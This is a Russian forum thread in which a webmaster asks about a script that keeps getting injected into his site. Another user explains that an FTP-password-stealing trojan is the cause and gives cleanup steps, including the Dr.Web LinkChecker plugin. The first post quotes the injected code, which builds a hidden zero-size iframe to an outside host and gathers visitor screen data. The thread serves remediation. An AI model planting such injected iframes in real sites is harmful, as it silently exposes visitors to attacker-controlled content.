Как защитить свой сайт от троянов и вредоносных скриптов

[DapKUH]

Итак вопрос мой будет состоять в том что в коде моего сайта постоянно от куда то появляется кусок скрипта:

Код Выделить Развернуть

<script language="javascript1.2" type="text/javascript"><!--
s=screen;frm+='.tu2.ru/z';a+=';s='+s.width+'*'+s.height;lo+='<iframe src="';
a+=';d='+(s.colorDepth?s.colorDepth:s.pixelDepth);frm+='et.php';js=12;//--></script>
<script language="javascript1.3" type="text/javascript"><!--
li='" width="0"  height="0" >';js=13;li+='</iframe>';//--></script>
И из за этого на сайте вирусы и всякая фигня, права на запись на вывод баннеров, сделано через <?php include("bannes.php"); ?> стоят 644, т.е только на просмотр.. Народ в чем может быть косяк что за хост tu2.ru ? я боюсь что эта фигня тащик куксы у посетителей.. 

[Everybody]

Ифрейм вирус, знакомая ситуация.
Изза чего: Обычно если вы не имеете нормальный антивирусник, то при заходе на сайт зараженный подобным ифрейм вирусом, заражаетесь и вы (и так по цепочке) - посколько это троян то он тянет с вас все что можно (пароли сохраненные в фтп менеджерах, RDP, Аська и т.д. тоесть где вы вводите свои данные). На одном форуме читал что файл сначало закачивается к вам при заходе на сайт, попадая на комп потом активируется...
Если на компьютере имеется фтп менеджер например Total Commander (мы обычно там пароли сохраняем для своего удобста, что не желательно) то троян вставляет во все индексные файлы ифрейм код наподобие что приведен выше, также и вебсервер на компьютере тоже подвергается саражению индексных файлов index.php, index.html, index.htm, main.php, main.htm и т.д.
-
Как исправить: Первым делом сменить пароли на фтп или другие доступы через которые можно было проникнуть к зараженному ПК. Сразу же просканировать всё и вся. Потом очистить весь веб от кода (сканируем папку с сайтом по наличию кода iframe, например прогой Text Replacer скачать можно с web-hack.ru)
-
Dr.Web выпустили удобный плагин для Mozilla, с его помощью можно просканировать любой сайт на наличие вредоносного кода (даже не заходя на него.)
_https://www.freedrweb.com/browser/mozilla+firefox/

Спойлер

Dr.Web LinkChecker для Firefox (0.8 - 3.0) и Mozilla (1.7 - 1.

Как установить Dr.Web LinkChecker?   Скачайте плагин

В большинстве случаев появится окошко с предупреждением о начале установки и кнопками "Cancel" и "Install now". Нажмите "Install now". Перезапустите браузер. Плагин успешно установлен.

Если при установке возникают проблемы, убедитесь, что в настройках Вашего Firefox разрешено устанавливать расширения. Для этого зайдите в меню Инструменты -> Настройки -> Web - функции и проверьте, установлен ли флажок "Разрешить сайтам устанавливать программное обеспечение".

Как пользоваться Dr.Web LinkChecker?
Щелкните правой кнопкой мышки по ссылке, которую Вы хотите посетить. В открывшемся контекстном меню выберите пункт «Проверить Dr.Web». Дождитесь результата проверки.

Как удалить Dr.Web LinkChecker?
В меню «Инструменты» (Tools) выберите пункт «Расширения» (Extensions). В появившемся списке установленных расширений найдите «Dr.Web link checker», выделите его и нажмите «Удалить» (Uninstall).

[свернуть]

[DapKUH]

Большое спасибо за подсказку. На счет паролей теперь все поменял.. но не могу понять.. стоит же линукс и на нем авирь самый нормальный который обновляется постоянно и проверяет директории /var/www - И не находит не 1 вируса..

В общем я все сделал вначале как ты сказал, а потом просто поставил защиту через .htaccess на тот файл в котором постоянно появляется этот вирусняк, теперь вроде нормально. Спасибо за быстрый ответ, как обычно выручил